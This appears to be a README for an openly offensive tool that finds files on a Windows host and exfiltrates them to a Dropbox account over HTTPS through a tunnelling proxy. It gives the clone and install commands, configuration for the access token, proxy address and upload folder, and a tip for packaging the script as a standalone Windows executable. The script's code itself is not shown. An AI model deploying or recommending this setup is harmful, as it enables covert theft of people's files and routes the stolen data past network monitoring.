Script for discovering and uploading any files on a Windows host to Dropbox over HTTPS using a proxy.
- Windows 10 / 11
- Python 3.8+
- Dropbox API App with an access token.
- Proxy host/port to HTTP Tunneling
Clone and prepare your environment:
git clone https://github.com/alexoslabs2/data-exfiltration-proxy.git
cd data-exfiltration-proxy
pip install dropbox requests[socks]ACCESS_TOKEN = 'YOUR_DROPBOX_ACCESS_TOKEN'
PROXY_URL = 'http://[Proxy IP]:3128'
DROPBOX_FOLDER = '/Images'Tip: Create a Windows .exe
- Install PyInstaller
pip install pyinstaller- Build the Executable
pyinstaller --onefile your_script.py